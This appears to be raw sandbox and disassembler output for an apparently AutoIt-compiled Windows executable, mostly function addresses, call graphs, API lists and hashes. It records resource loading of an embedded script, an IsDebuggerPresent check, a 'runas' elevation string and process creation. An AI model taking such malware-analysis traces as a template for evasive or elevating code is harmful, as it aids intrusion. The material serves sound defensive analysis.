7ff64392e0a8 4 API calls 99766->99767 99769 7ff6439aa7c2 99767->99769 99770 7ff6439271f8 4 API calls 99769->99770 99772 7ff6439aa7d3 99770->99772 99771 7ff643927ab8 CloseHandle 99771->99745 99773 7ff64399b3a8 12 API calls 99772->99773 99774 7ff6439aa7e0 Concurrency::wait 99773->99774 99774->99745 99940 7ff643928314 99774->99940 99776 7ff64392d4cc 48 API calls 99775->99776 99777 7ff6439a63f8 99776->99777 99968 7ff64399bdec 99777->99968 99779 7ff6439a6404 99779->99720 99976 7ff6439bf630 99780->99976 99784 7ff6439a5ba5 99783->99784 99785 7ff6439a5be5 FindClose 99784->99785 99786 7ff6439a5bd5 99784->99786 99788 7ff6439a5ba9 99784->99788 99785->99788 99787 7ff643927ab8 CloseHandle 99786->99787 99786->99788 99787->99788 99788->99720 99790 7ff6439bf630 164 API calls 99789->99790 99792 7ff6439bf182 99790->99792 99791 7ff6439bf1cd 99791->99720 99792->99791 100072 7ff64392ee20 5 API calls Concurrency::wait 99792->100072 99795 7ff6439a7e79 99794->99795 99796 7ff643929640 4 API calls 99795->99796 99826 7ff6439a7f55 Concurrency::wait 99795->99826 99798 7ff6439a7ea6 99796->99798 99797 7ff64392834c 5 API calls 99800 7ff6439a7f99 99797->99800 99799 7ff643929640 4 API calls 99798->99799 99801 7ff6439a7eaf 99799->99801 99802 7ff64392d4cc 48 API calls 99800->99802 99803 7ff64392d4cc 48 API calls 99801->99803 99804 7ff6439a7fab 99802->99804 99805 7ff6439a7ebe 99803->99805 99806 7ff643926838 16 API calls 99804->99806 100073 7ff6439274ac RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 99805->100073 99808 7ff6439a7fba 99806->99808 99810 7ff6439a7fbe GetLastError 99808->99810 99811 7ff6439a7ff5 99808->99811 99809 7ff6439a7ed8 100074 7ff643927c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 99809->100074 99813 7ff6439a7fd8 99810->99813 99815 7ff643929640 4 API calls 99811->99815 99817 7ff643927ab8 CloseHandle 99813->99817 99820 7ff6439a7fe5 99813->99820 99814 7ff6439a7f07 99814->99826 100075 7ff64399bdd4 lstrlenW GetFileAttributesW FindFirstFileW FindClose 99814->100075 99818 7ff6439a8035 99815->99818 99817->99820 99818->99820 100077 7ff643990d38 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 99818->100077 99819 7ff6439a7f17 99821 7ff6439a7f1b 99819->99821 99819->99826 99820->99720 99823 7ff64392ec00 4 API calls 99821->99823 99824 7ff6439a7f28 99823->99824 100076 7ff64399bab8 8 API calls Concurrency::wait 99824->100076 99826->99797 99826->99820 99827 7ff6439a7f31 Concurrency::wait 99827->99826 99829 7ff6439aa680 99828->99829 99830 7ff64392834c 5 API calls 99829->99830 99835 7ff6439aa71a 99829->99835 99831 7ff6439aa6be 99830->99831 99833 7ff64392d4cc 48 API calls 99831->99833 99832 7ff6439aa7fd 100078 7ff6439a1864 6 API calls 99832->100078 99834 7ff6439aa6d0 99833->99834 99838 7ff643926838 16 API calls 99834->99838 99835->99832 99836 7ff6439aa6f3 99835->99836 99841 7ff6439aa770 99835->99841 99836->99720 99840 7ff6439aa6e2 99838->99840 99839 7ff6439aa805 99844 7ff64399b334 4 API calls 99839->99844 99840->99835 99842 7ff6439aa6e6 99840->99842 99843 7ff64392d4cc 48 API calls 99841->99843 99842->99836 99845 7ff643927ab8 CloseHandle 99842->99845 99849 7ff6439aa778 99843->99849 99860 7ff6439aa7e0 Concurrency::wait 99844->99860 99845->99836 99846 7ff6439aa7ee 99848 7ff64399b3a8 12 API calls 99846->99848 99847 7ff6439aa7a7 99850 7ff6439298e8 4 API calls 99847->99850 99848->99860 99849->99846 99849->99847 99852 7ff6439aa7b5 99850->99852 99851 7ff643928314 CloseHandle 99854 7ff6439aa85c 99851->99854 99853 7ff64392e0a8 4 API calls 99852->99853 99855 7ff6439aa7c2 99853->99855 99854->99836 99857 7ff643927ab8 CloseHandle 99854->99857 99856 7ff6439271f8 4 API calls 99855->99856 99858 7ff6439aa7d3 99856->99858 99857->99836 99859 7ff64399b3a8 12 API calls 99858->99859 99859->99860 99860->99836 99860->99851 99863->99713 99864->99719 99865->99719 99866->99706 99867->99728 99868->99728 99869->99720 99870->99728 99872 7ff64392d50b 99871->99872 99873 7ff64392d4f2 99871->99873 99874 7ff64392d53e 99872->99874 99875 7ff64392d513 99872->99875 99873->99763 99876 7ff643979cc4 99874->99876 99878 7ff64392d550 99874->99878 99884 7ff643979bbc 99874->99884 99943 7ff64394956c 31 API calls 99875->99943 99946 7ff643949538 31 API calls 99876->99946 99944 7ff643944834 46 API calls 99878->99944 99880 7ff64392d522 99885 7ff64392ec00 4 API calls 99880->99885 99882 7ff643979cdc 99886 7ff643979c3e Concurrency::wait wcscpy 99884->99886 99887 7ff643944c68 4 API calls 99884->99887 99885->99873 99945 7ff643944834 46 API calls 99886->99945 99888 7ff643979c0a 99887->99888 99889 7ff64392ec00 4 API calls 99888->99889 99889->99886 99891 7ff64399b3c8 99890->99891 99892 7ff64399b42a 99890->99892 99893 7ff64399b41e 99891->99893 99894 7ff64399b3d0 99891->99894 99895 7ff64399b334 4 API calls 99892->99895 99954 7ff64399b458 8 API calls 99893->99954 99897 7ff64399b3f1 99894->99897 99898 7ff64399b3dd 99894->99898 99907 7ff64399b410 Concurrency::wait 99895->99907 99952 7ff64392a368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 99897->99952 99950 7ff64392a368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 99898->99950 99901 7ff64399b3f6 99953 7ff64399b270 6 API calls 99901->99953 99902 7ff64399b3e2 99951 7ff643944120 6 API calls 99902->99951 99905 7ff64399b3ef 99947 7ff64399b384 99905->99947 99907->99774 99909 7ff643944c68 4 API calls 99908->99909 99910 7ff643928363 99909->99910 99911 7ff643928314 CloseHandle 99910->99911 99912 7ff64392836f 99911->99912 99913 7ff643929640 4 API calls 99912->99913 99914 7ff643928378 99913->99914 99915 7ff643928314 CloseHandle 99914->99915 99916 7ff643928380 99915->99916 99916->99748 99918 7ff643928314 CloseHandle 99917->99918 99919 7ff64392685a 99918->99919 99920 7ff64396caa8 99919->99920 99921 7ff64392687d CreateFileW 99919->99921 99922 7ff64396caae CreateFileW 99920->99922 99929 7ff6439268d9 99920->99929 99926 7ff6439268ab 99921->99926 99923 7ff64396cae6 99922->99923 99922->99926 99957 7ff643926a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 99923->99957 99925 7ff64396caf3 99925->99926 99932 7ff6439268e4 99926->99932 99955 7ff6439268f4 9 API calls 99926->99955 99928 7ff6439268c1 99928->99929 99956 7ff643926a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 99928->99956 99930 7ff64399b334 4 API calls 99929->99930 99929->99932 99930->99932 99932->99750 99932->99758 99958 7ff6439282e4 99933->99958 99936->99753 99963 7ff64399b188 99937->99963 99941 7ff64392833d CloseHandle 99940->99941 99942 7ff64392832a 99940->99942 99941->99942 99942->99745 99942->99771 99943->99880 99944->99880 99945->99876 99946->99882 99948 7ff64399b334 4 API calls 99947->99948 99949 7ff64399b399 99948->99949 99949->99907 99950->99902 99951->99905 99952->99901 99953->99905 99954->99907 99955->99928 99956->99929 99957->99925 99959 7ff643928314 CloseHandle 99958->99959 99960 7ff6439282f2 Concurrency::wait 99959->99960 99961 7ff643928314 CloseHandle 99960->99961 99962 7ff643928303 99961->99962 99964 7ff64399b193 99963->99964 99965 7ff64399b19c WriteFile 99963->99965 99967 7ff64399b208 SetFilePointerEx SetFilePointerEx SetFilePointerEx 99964->99967 99965->99774 99967->99965 99971 7ff64399c7c0 lstrlenW 99968->99971 99972 7ff64399bdf5 99971->99972 99973 7ff64399c7dd GetFileAttributesW 99971->99973 99972->99779 99973->99972 99974 7ff64399c7eb FindFirstFileW 99973->99974 99974->99972 99975 7ff64399c7ff FindClose 99974->99975 99975->99972 99978 7ff6439bf671 fread_s 99976->99978 99977 7ff64392d4cc 48 API calls 99979 7ff6439bf74d 99977->99979 99978->99977 100044 7ff64392e330 99979->100044 99981 7ff6439bf759 99982 7ff6439bf840 99981->99982 99983 7ff6439bf762 99981->99983 99984 7ff6439bf87d GetCurrentDirectoryW 99982->99984 99986 7ff64392d4cc 48 API calls 99982->99986 99985 7ff64392d4cc 48 API calls 99983->99985 99987 7ff643944c68 4 API calls 99984->99987 99988 7ff6439bf777 99985->99988 99989 7ff6439bf85c 99986->99989 99990 7ff6439bf8a7 GetCurrentDirectoryW 99987->99990 99991 7ff64392e330 4 API calls 99988->99991 99992 7ff64392e330 4 API calls 99989->99992 99993 7ff6439bf8b5 99990->99993 99994 7ff6439bf783 99991->99994 99995 7ff6439bf868 99992->99995 99996 7ff6439bf8f0 99993->99996 100057 7ff64393f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 99993->100057 99997 7ff64392d4cc 48 API calls 99994->99997 99995->99984 99995->99996 100002 7ff6439bf901 99996->100002 100003 7ff6439bf905 99996->100003 99999 7ff6439bf798 99997->99999 100001 7ff64392e330 4 API calls 99999->100001 100000 7ff6439bf8d0 100058 7ff64393f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 100000->100058 100005 7ff6439bf7a4 100001->100005 100012 7ff6439bfa0f CreateProcessW 100002->100012 100013 7ff6439bf972 100002->100013 100060 7ff64399fddc 8 API calls 100003->100060 100007 7ff64392d4cc 48 API calls 100005->100007 100006 7ff6439bf8e0 100059 7ff64393f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 100006->100059 100010 7ff6439bf7b9 100007->100010 100015 7ff64392e330 4 API calls 100010->100015 100011 7ff6439bf90e 100061 7ff64399fca8 8 API calls 100011->100061 100021 7ff6439bf9b4 100012->100021 100063 7ff64398d1f8 99 API calls 100013->100063 100017 7ff6439bf7c5 100015->100017 100019 7ff6439bf806 GetSystemDirectoryW 100017->100019 100022 7ff64392d4cc 48 API calls 100017->100022 100018 7ff6439bf926 100062 7ff64399fafc 8 API calls ~SyncLockT 100018->100062 100024 7ff643944c68 4 API calls 100019->100024 100027 7ff6439bfabe CloseHandle 100021->100027 100028 7ff6439bfa64 100021->100028 100025 7ff6439bf7e1 100022->100025 100023 7ff6439bf94f 100023->100002 100026 7ff6439bf830 GetSystemDirectoryW 100024->100026 100029 7ff64392e330 4 API calls 100025->100029 100026->99993 100030 7ff6439bfacc 100027->100030 100034 7ff6439bfaf5 100027->100034 100038 7ff6439bfa84 GetLastError 100028->100038 100035 7ff6439bf7ed 100029->100035 100064 7ff64399f7dc 100030->100064 100031 7ff6439bfafe 100041 7ff6439bfaa3 100031->100041 100034->100031 100037 7ff6439bfb26 CloseHandle 100034->100037 100035->99993 100035->100019 100037->100041 100038->100041 100048 7ff64399f51c 100041->100048 100045 7ff64392e342 100044->100045 100046 7ff643944c68 4 API calls 100045->100046 100047 7ff64392e361 wcscpy 100046->100047 100047->99981 100049 7ff64399f7dc CloseHandle 100048->100049 100050 7ff64399f52a 100049->100050 100069 7ff64399f7b8 100050->100069 100053 7ff64399f7b8 ~SyncLockT CloseHandle 100054 7ff64399f53c 100053->100054 100055 7ff64399f7b8 ~SyncLockT CloseHandle 100054->100055 100056 7ff64399f545 100055->100056 100056->99720 100057->100000 100058->100006 100059->99996 100060->100011 100061->100018 100062->100023 100063->100021 100065 7ff64399f7b8 ~SyncLockT CloseHandle 100064->100065 100066 7ff64399f7ee 100065->100066 100067 7ff64399f7b8 ~SyncLockT CloseHandle 100066->100067 100068 7ff64399f7f7 100067->100068 100070 7ff64399f533 100069->100070 100071 7ff64399f7c9 CloseHandle 100069->100071 100070->100053 100071->100070 100072->99791 100073->99809 100074->99814 100075->99819 100076->99827 100077->99820 100078->99839 100079 7ff64397e263 100080 7ff64397e271 100079->100080 100090 7ff643932680 100079->100090 100080->100080 100081 7ff6439329c8 PeekMessageW 100081->100090 100082 7ff6439326da GetInputState 100082->100081 100082->100090 100084 7ff64397d181 TranslateAcceleratorW 100084->100090 100085 7ff643932a1f TranslateMessage DispatchMessageW 100086 7ff643932a33 PeekMessageW 100085->100086 100086->100090 100087 7ff6439328b9 timeGetTime 100087->100090 100088 7ff64397d2bb timeGetTime 100112 7ff643942ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 100088->100112 100090->100081 100090->100082 100090->100084 100090->100085 100090->100086 100090->100087 100090->100088 100094 7ff6439366c0 300 API calls 100090->100094 100095 7ff643932856 100090->100095 100096 7ff643933c20 300 API calls 100090->100096 100097 7ff6439a34e4 77 API calls 100090->100097 100099 7ff643932b70 100090->100099 100106 7ff643942de8 100090->100106 100111 7ff643932e30 300 API calls 2 library calls 100090->100111 100113 7ff6439a3a28 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 100090->100113 100114 7ff6439ba320 300 API calls Concurrency::wait 100090->100114 100094->100090 100096->100090 100097->100090 100100 7ff643932ba9 100099->100100 100101 7ff643932b96 100099->100101 100135 7ff6439a34e4 77 API calls 3 library calls 100100->100135 100115 7ff643932050 100101->100115 100103 7ff643932b9e 100103->100090 100105 7ff64397e55c 100107 7ff643942e0d 100106->100107 100109 7ff643942e2a 100106->100109 100107->100090 100108 7ff643942e5b IsDialogMessageW 100108->100107 100108->100109 100109->100107 100109->100108 100110 7ff643989d94 GetClassLongPtrW 100109->100110 100110->100108 100110->100109 100111->100090 100112->100090 100113->100090 100114->100090 100116 7ff643933c20 300 API calls 100115->100116 100126 7ff6439320a8 100116->100126 100117 7ff64393212d 100117->100103 100118 7ff64397d06f 100140 7ff6439a34e4 77 API calls 3 library calls 100118->100140 100120 7ff64397d08d 100121 7ff643932552 100123 7ff643944c68 4 API calls 100121->100123 100122 7ff64397d036 100138 7ff64392ee20 5 API calls Concurrency::wait 100122->100138 100131 7ff6439323cb memcpy_s 100123->100131 100125 7ff643944c68 4 API calls 100132 7ff6439322a5 memcpy_s 100125->100132 100126->100117 100126->100118 100126->100121 100127 7ff643932244 100126->100127 100126->100131 100126->100132 100127->100131 100136 7ff643931ce4 301 API calls Concurrency::wait 100127->100136 100128 7ff64397d062 100139 7ff64392ee20 5 API calls Concurrency::wait 100128->100139 100131->100122 100134 7ff6439a34e4 77 API calls 100131->100134 100137 7ff643924a60 300 API calls 100131->100137 100132->100125 100132->100131 100134->100131 100135->100105 100136->100132 100137->100131 100138->100128 100139->100118 100140->100120 100141 7ff64397b221 100142 7ff64397b22a 100141->100142 100149 7ff643930378 100141->100149 100164 7ff6439947bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 100142->100164 100144 7ff64397b241 100165 7ff643994708 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 100144->100165 100146 7ff64397b264 100147 7ff643933c20 300 API calls 100146->100147 100148 7ff64397b292 100147->100148 100156 7ff643930405 100148->100156 100166 7ff6439b8d98 49 API calls Concurrency::wait 100148->100166 100158 7ff64392f7b8 100149->100158 100152 7ff64397b2d9 Concurrency::wait 100152->100149 100167 7ff6439947bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 100152->100167 100154 7ff64393070a 100156->100154 100157 7ff64392e0a8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 100156->100157 100168 7ff64392ee20 5 API calls Concurrency::wait 100156->100168 100157->100156 100159 7ff64392f7d5 100158->100159 100160 7ff64392f7de 100159->100160 100161 7ff643929640 4 API calls 100159->100161 100162 7ff64392e0a8 4 API calls 100159->100162 100163 7ff64392f7b8 4 API calls 100159->100163 100160->100156 100161->100159 100162->100159 100163->100159 100164->100144 100165->100146 100166->100152 100167->100152 100168->100156 100169 7ff64397f890 100178 7ff64392e18c 100169->100178 100171 7ff64397f8a9 100177 7ff64397f915 Concurrency::wait 100171->100177 100184 7ff643942ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 100171->100184 100174 7ff64397f8f6 100174->100177 100185 7ff6439a1464 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 100174->100185 100175 7ff6439803e1 Concurrency::wait 100177->100175 100186 7ff6439a34e4 77 API calls 3 library calls 100177->100186 100179 7ff64392e1a7 100178->100179 100180 7ff64392e1c2 100178->100180 100187 7ff64392ee20 5 API calls Concurrency::wait 100179->100187 100183 7ff64392e1af 100180->100183 100188 7ff64392ee20 5 API calls Concurrency::wait 100180->100188 100183->100171 100184->100174 100186->100175 100187->100183 100188->100183 100189 7ff6439490e0 100196 7ff64395af30 100189->100196 100191 7ff6439490e5 100192 7ff64395ba10 _isindst LeaveCriticalSection 100191->100192 100193 7ff6439490f0 100192->100193 100194 7ff643949118 11 API calls 100193->100194 100195 7ff6439490fc 100193->100195 100194->100195 100201 7ff64395b778 35 API calls 3 library calls 100196->100201 100198 7ff64395af3b 100202 7ff64395b26c 35 API calls abort 100198->100202 100201->100198

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF643923785), ref: 00007FF6439237F2
                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF643923785), ref: 00007FF643923807
                                                                      • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF643923785), ref: 00007FF64392388D
                                                                        • Part of subcall function 00007FF643923F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF6439238BF,?,?,?,?,?,00007FF643923785), ref: 00007FF643923FFD
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF643923785), ref: 00007FF643923924
                                                                      • MessageBoxA.USER32 ref: 00007FF64396B888
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF643923785), ref: 00007FF64396B8E1
                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,00007FF643923785), ref: 00007FF64396B968
                                                                      • ShellExecuteW.SHELL32 ref: 00007FF64396B98F
                                                                        • Part of subcall function 00007FF643923B84: GetSysColorBrush.USER32 ref: 00007FF643923B9E
                                                                        • Part of subcall function 00007FF643923B84: LoadCursorW.USER32 ref: 00007FF643923BAE
                                                                        • Part of subcall function 00007FF643923B84: LoadIconW.USER32 ref: 00007FF643923BC3
                                                                        • Part of subcall function 00007FF643923B84: LoadIconW.USER32 ref: 00007FF643923BDC
                                                                        • Part of subcall function 00007FF643923B84: LoadIconW.USER32 ref: 00007FF643923BF5
                                                                        • Part of subcall function 00007FF643923B84: LoadImageW.USER32 ref: 00007FF643923C21
                                                                        • Part of subcall function 00007FF643923B84: RegisterClassExW.USER32 ref: 00007FF643923C85
                                                                        • Part of subcall function 00007FF643923CBC: CreateWindowExW.USER32 ref: 00007FF643923D0C
                                                                        • Part of subcall function 00007FF643923CBC: CreateWindowExW.USER32 ref: 00007FF643923D5F
                                                                        • Part of subcall function 00007FF643923CBC: ShowWindow.USER32 ref: 00007FF643923D75
                                                                        • Part of subcall function 00007FF643926258: Shell_NotifyIconW.SHELL32 ref: 00007FF643926350
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                      • String ID: This is a third-party compiled AutoIt script.$runas
                                                                      • API String ID: 1593035822-3287110873
                                                                      • Opcode ID: 3952ebee020ff551dd9b970e0e86bf8aed240aa896a8a003d38d5c5607345415
                                                                      • Instruction ID: 6aa65847c1563b5944e22c0de8f3a4b4e7bf6c0cd41d05c4fb1f7d9dd6f61b3c
                                                                      • Opcode Fuzzy Hash: 3952ebee020ff551dd9b970e0e86bf8aed240aa896a8a003d38d5c5607345415
                                                                      • Instruction Fuzzy Hash: 20716A21A1DA8395FA20FB21E9831F86760BF51344F801532E54DE62ABFF3CE649E710

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 352 7ff643926580-7ff6439265fc call 7ff643944c68 call 7ff643926c98 call 7ff643945d00 359 7ff643926737-7ff64392673a 352->359 360 7ff643926602-7ff643926606 352->360 361 7ff64396c9f5-7ff64396c9fd call 7ff6439a2e00 359->361 362 7ff643926740-7ff643926753 CreateStreamOnHGlobal 359->362 363 7ff64392660c-7ff643926617 call 7ff643955514 360->363 364 7ff64396ca03-7ff64396ca1e 360->364 361->364 362->360 366 7ff643926759-7ff643926777 FindResourceExW 362->366 372 7ff64392661b-7ff64392664e call 7ff6439267d8 363->372 375 7ff64396ca27-7ff64396ca60 call 7ff643926810 call 7ff6439267d8 364->375 366->360 371 7ff64392677d 366->371 373 7ff64396c97e-7ff64396c991 LoadResource 371->373 380 7ff6439266e8 372->380 381 7ff643926654-7ff64392665f 372->381 373->360 376 7ff64396c997-7ff64396c9a8 SizeofResource 373->376 384 7ff6439266ee 375->384 397 7ff64396ca66 375->397 376->360 379 7ff64396c9ae-7ff64396c9ba LockResource 376->379 379->360 383 7ff64396c9c0-7ff64396c9f0 379->383 380->384 385 7ff6439266ae-7ff6439266b2 381->385 386 7ff643926661-7ff64392666f 381->386 383->360 388 7ff6439266f1-7ff643926715 384->388 385->380 390 7ff6439266b4-7ff6439266cf call 7ff643926810 385->390 389 7ff643926670-7ff64392667d 386->389 393 7ff643926717-7ff643926724 call 7ff643944c24 * 2 388->393 394 7ff643926729-7ff643926736 388->394 395 7ff643926680-7ff64392668f 389->395 390->372 393->394 400 7ff643926691-7ff643926695 395->400 401 7ff6439266d4-7ff6439266dd 395->401 397->388 400->375 406 7ff64392669b-7ff6439266a8 400->406 403 7ff6439266e3-7ff6439266e6 401->403 404 7ff643926782-7ff64392678c 401->404 403->400 409 7ff643926797-7ff6439267a1 404->409 410 7ff64392678e 404->410 406->389 408 7ff6439266aa 406->408 408->385 411 7ff6439267ce 409->411 412 7ff6439267a3-7ff6439267ad 409->412 410->409 411->373 413 7ff6439267c6 412->413 414 7ff6439267af-7ff6439267bb 412->414 413->411 414->395 415 7ff6439267c1 414->415 415->413
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                      • String ID: AU3!$EA06$SCRIPT
                                                                      • API String ID: 3051347437-2925976212
                                                                      • Opcode ID: 8a3c5553b4e00065fee7198aeb753497d16f6c8843a83ea9b593933600f15c67
                                                                      • Instruction ID: fffd94a6076f92e6b37e962daf6ef3fdba6ccff34372b548af3cc0f8382d9983
                                                                      • Opcode Fuzzy Hash: 8a3c5553b4e00065fee7198aeb753497d16f6c8843a83ea9b593933600f15c67
                                                                      • Instruction Fuzzy Hash: 5F911172B0EA4186FB20BB21E546ABC27A4BB45B84F454535DE5DE7B86EF78E404E300

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 482 7ff643941d80-7ff643941e17 call 7ff643929640 GetVersionExW call 7ff643927cf4 487 7ff643989450 482->487 488 7ff643941e1d 482->488 489 7ff643989457-7ff64398945d 487->489 490 7ff643941e20-7ff643941e46 call 7ff64392dda4 488->490 491 7ff643989463-7ff643989480 489->491 496 7ff643941e4c 490->496 497 7ff643941fc1 490->497 491->491 493 7ff643989482-7ff643989485 491->493 493->490 495 7ff64398948b-7ff643989491 493->495 495->489 498 7ff643989493 495->498 499 7ff643941e53-7ff643941e59 496->499 497->487 502 7ff643989498-7ff6439894a1 498->502 500 7ff643941e5f-7ff643941e7c 499->500 500->500 501 7ff643941e7e-7ff643941e81 500->501 501->502 503 7ff643941e87-7ff643941ed6 call 7ff64392dda4 501->503 502->499 504 7ff6439894a7 502->504 507 7ff643941edc-7ff643941ede 503->507 508 7ff643989645-7ff64398964d 503->508 504->497 511 7ff643941ee4-7ff643941efa 507->511 512 7ff6439894ac-7ff6439894af 507->512 509 7ff64398964f-7ff643989658 508->509 510 7ff64398965a-7ff64398965d 508->510 513 7ff643989686-7ff643989692 509->513 510->513 514 7ff64398965f-7ff643989674 510->514 515 7ff643989572-7ff643989579 511->515 516 7ff643941f00-7ff643941f02 511->516 517 7ff643941f3c-7ff643941f80 GetCurrentProcess IsWow64Process call 7ff643946240 512->517 518 7ff6439894b5-7ff643989501 512->518 527 7ff64398969d-7ff6439896b3 call 7ff6439932f4 513->527 519 7ff64398967f 514->519 520 7ff643989676-7ff64398967d 514->520 521 7ff643989589-7ff643989599 515->521 522 7ff64398957b-7ff643989584 515->522 523 7ff64398959e-7ff6439895b3 516->523 524 7ff643941f08-7ff643941f0b 516->524 517->527 541 7ff643941f86-7ff643941f8b GetSystemInfo 517->541 518->517 526 7ff643989507-7ff64398950e 518->526 519->513 520->513 521->517 522->517 530 7ff6439895c3-7ff6439895d3 523->530 531 7ff6439895b5-7ff6439895be 523->531 528 7ff643941f11-7ff643941f2d 524->528 529 7ff6439895ed-7ff6439895f0 524->529 533 7ff643989510-7ff643989518 526->533 534 7ff643989534-7ff64398953c 526->534 550 7ff6439896b5-7ff6439896d5 call 7ff6439932f4 527->550 551 7ff6439896d7-7ff6439896dc GetSystemInfo 527->551 538 7ff6439895d8-7ff6439895e8 528->538 539 7ff643941f33 528->539 529->517 540 7ff6439895f6-7ff643989620 529->540 530->517 531->517 542 7ff643989526-7ff64398952f 533->542 543 7ff64398951a-7ff643989521 533->543 535 7ff64398953e-7ff643989547 534->535 536 7ff64398954c-7ff643989554 534->536 535->517 544 7ff643989564-7ff64398956d 536->544 545 7ff643989556-7ff64398955f 536->545 538->517 539->517 547 7ff643989630-7ff643989640 540->547 548 7ff643989622-7ff64398962b 540->548 549 7ff643941f91-7ff643941fc0 541->549 542->517 543->517 544->517 545->517 547->517 548->517 552 7ff6439896e2-7ff6439896ea 550->552 551->552 552->549 554 7ff6439896f0-7ff6439896f7 FreeLibrary 552->554 554->549
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentInfoSystemVersionWow64
                                                                      • String ID: |O
                                                                      • API String ID: 1568231622-607156228
                                                                      • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                      • Instruction ID: 86efce04ce56cdf1359c4734417e136cdc15e90464973e715652feb651494de7
                                                                      • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                      • Instruction Fuzzy Hash: 8AD19131AAD2E285FA20FB14A8531753F90AF61784F44007AD59DE26A7FF6CB181F721

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
